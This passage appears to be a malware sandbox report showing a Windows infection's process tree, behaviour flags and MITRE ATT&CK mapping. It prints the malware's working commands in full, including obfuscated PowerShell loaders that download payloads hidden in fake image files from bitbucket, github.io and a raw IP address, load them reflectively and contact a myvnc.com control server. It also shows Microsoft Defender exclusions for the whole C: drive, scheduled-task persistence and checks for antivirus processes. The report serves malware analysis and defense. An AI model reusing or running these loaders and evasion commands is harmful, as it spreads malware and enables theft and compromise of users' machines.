@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@a@Bh@GE@a@Bn@GQ@Yw@v@HM@ZQBn@GE@bQBp@C8@bgBp@C4@bwBj@C4@aQBh@GQ@bgB1@Hk@a@Br@Gk@b@Bh@HY@aQBo@HM@Lw@v@Do@cw@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBS@GU@ZwBB@HM@bQ@n@Cw@I@@n@D@@Jw@p@Ck@fQB9@@==';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5124
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $Bytes = 'htt'; $Bytes2 = 'ps://'; $lfsdfsdg = $Bytes +$Bytes2; $links = @(($lfsdfsdg + 'bitbucket.org/gfhdjkdd/jhhhhhhh/downloads/test2.jpg?137113'), ($lfsdfsdg + 'ofice365.github.io/1/test.jpg')); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.haahgdc/segami/ni.oc.iadnuyhkilavihs//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:9436
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        9⤵
        
        PID:11512
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:11532
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\2.js"
        7⤵
        
        PID:5340
    - - C:\Users\Admin\AppData\Local\Temp\10299620101\weC48Q7.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299620101\weC48Q7.exe"
        5⤵
        Executes dropped EXE
        
        PID:7192
      - C:\Users\Admin\AppData\Local\Temp\onefile_7192_133871235721881445\windowscore.exe
        
        C:\Users\Admin\AppData\Local\Temp\10299620101\weC48Q7.exe
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:7532
    - - C:\Users\Admin\AppData\Local\Temp\10299630101\Kr9UTz2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299630101\Kr9UTz2.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5152
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:8896
    - - C:\Users\Admin\AppData\Local\Temp\10299640101\zx4PJh6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299640101\zx4PJh6.exe"
        5⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:5796
      - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:6256
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:9600
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:9624
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        7⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:9848
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:9864
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 440824
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10004
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Architecture.wmv
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10108
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Offensive" Inter
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10472
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:10532
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5272
        
        C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
        
        Organizations.com h
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:11872
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 11872 -s 1004
        8⤵
        Program crash
        
        PID:13144
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:12124
    - - C:\Users\Admin\AppData\Local\Temp\10299650101\50KfF6O.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299650101\50KfF6O.exe"
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:10684
      - C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Local\Temp\10299650101\50KfF6O.exe
        6⤵
        Views/modifies file attributes
        
        PID:10960
    - - C:\Users\Admin\AppData\Local\Temp\10299660101\OkH8IPF.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299660101\OkH8IPF.exe"
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:12648
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:12712
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10299670141\4wAPcC0.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:12572
    - - C:\Users\Admin\AppData\Local\Temp\10299680101\ARxx7NW.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299680101\ARxx7NW.exe"
        5⤵
        Executes dropped EXE
        Drops file in Program Files directory
        
        PID:10356
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFIAdQBuAHQAaQBtAGUAQQBwAHAAJwA=
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:10396
      - C:\Program Files\RuntimeApp\0000008658.exe
        
        "C:\Program Files\RuntimeApp\0000008658.exe"
        6⤵
        Executes dropped EXE
        
        PID:13168
    - - C:\Users\Admin\AppData\Local\Temp\10299690101\wjfOfXh.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299690101\wjfOfXh.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:8588
    - - C:\Users\Admin\AppData\Local\Temp\10299700101\k3t05Da.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299700101\k3t05Da.exe"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        System Location Discovery: System Language Discovery
        
        PID:2832
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\File.bat" "
        6⤵
        
        PID:10168
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$base64Url = 'aHR0cDovLzE5Ni4yNTEuOTEuNDIvdXAvdXBsb2Fkcy9lbmNyeXB0aW9uMDIuanBn'; $url = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($base64Url)); $webClient = New-Object System.Net.WebClient; $imageBytes = $webClient.DownloadData($url); $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); $startIndex -ge 0 -and $endIndex -gt $startIndex; $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $dllBytes = [Convert]::FromBase64String($base64Command); $assembly = [System.Reflection.Assembly]::Load($dllBytes); [Stub.main]::Main('httpss.myvnc.com', '1907');"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6208
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\ohbuGGy.exe"
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:8820
      - C:\Windows\SysWOW64\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ohbuGGy" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7EFA.tmp"
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:12992
      - C:\Users\Admin\AppData\Local\Temp\10299700101\k3t05Da.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299700101\k3t05Da.exe"
        6⤵
        
        PID:7908
    - - C:\Users\Admin\AppData\Local\Temp\10299710101\d3jhg_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299710101\d3jhg_003.exe"
        5⤵
        
        PID:7444
      - C:\Windows\SYSTEM32\cmd.exe
        
        cmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'
        6⤵
        
        PID:7432
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-MpPreference -ExclusionPath 'C:'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:7472
      - C:\Windows\system32\svchost.exe
        
        "C:\Windows\system32\svchost.exe"
        6⤵
        
        PID:7516
        
        C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe
        
        "C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""
        7⤵
        
        PID:13012
        
        C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe
        
        "C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""
        7⤵
        
        PID:9380
    - - C:\Users\Admin\AppData\Local\Temp\10299720101\tK0oYx3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299720101\tK0oYx3.exe"
        5⤵
        
        PID:1388
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        6⤵
        
        PID:1172
    - - C:\Users\Admin\AppData\Local\Temp\10299730101\3db017541a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10299730101\3db017541a.exe"
        5⤵
        
        PID:588
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2S4013.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\2S4013.exe
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:4600
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3W01C.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\3W01C.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:2340

C:\Windows\system32\conhost.exe
conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
1⤵
- Process spawned unexpected child process
PID:10716
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:10756

C:\Windows\system32\conhost.exe
conhost --headless powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
1⤵
- Process spawned unexpected child process
PID:11956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell $kcxehirfjzumlv='ur' ;set-alias protons c$($kcxehirfjzumlv)l;$lwrcpx=(5668,5667,5684,5671,5670,5667,5685,5671,5669,5681,5616,5682,5684,5681,5617,5619,5616,5682,5674,5682,5633,5685,5631,5672,5678,5675,5668,5667,5668,5669,5619,5619);$ospjen=('ertigos','get-cmdlet');$bszmkalfhpv=$lwrcpx;foreach($avxgnzdsuhi in $bszmkalfhpv){$gmphklfu=$avxgnzdsuhi;$utbfjnqdokhigr=$utbfjnqdokhigr+[char]($gmphklfu-5570);$gktdxfzup=$utbfjnqdokhigr; $jgifpyq=$gktdxfzup};$fucnvtrwyimp[2]=$jgifpyq;$rpethob='rl';$mksadlw=1;.$([char](((200 + 30) - (100 + 25)))+'e'+'x')(protons -useb $jgifpyq)
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:12012

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 11872 -ip 11872
1⤵
PID:12984

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBEAEQALQBtAHAAcABSAGUAZgBlAFIARQBOAGMARQAgAC0ARQB4AGMAbABVAFMAaQBvAG4AUABhAFQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwAVAB5AHAAZQBJAGQAXABBAHQAdAByAGkAYgB1AHQAZQBzAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXAAsAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABNAGkAYwByAG8AcwBvAGYAdAAuAE4ARQBUAFwARgByAGEAbQBlAHcAbwByAGsANgA0AFwAdgA0AC4AMAAuADMAMAAzADEAOQBcAEEAZABkAEkAbgBQAHIAbwBjAGUAcwBzAC4AZQB4AGUALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcACAALQBGAE8AcgBDAEUAOwAgAGEAZABEAC0AbQBQAHAAUgBFAGYARQBSAEUAbgBDAEUAIAAtAEUAeABDAGwAdQBzAGkATwBOAHAAcgBPAGMARQBzAFMAIABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAFIAbwBhAG0AaQBuAGcAXABUAHkAcABlAEkAZABcAEEAdAB0AHIAaQBiAHUAdABlAHMALgBlAHgAZQAgAC0ARgBvAFIAQwBFAA==
1⤵
- Command and Scripting Interpreter: PowerShell
PID:9872

C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5696

C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
C:\Users\Admin\AppData\Roaming\TypeId\Attributes.exe
1⤵
- Executes dropped EXE
PID:6536

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Safe Mode Boot

T1562.009

Modify Registry

T1112

Pre-OS Boot

T1542

Bootkit

T1542.003

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

Software Discovery

T1518

Security Software Discovery

T1518.001

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Virtualization/Sandbox Evasion

T1497

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

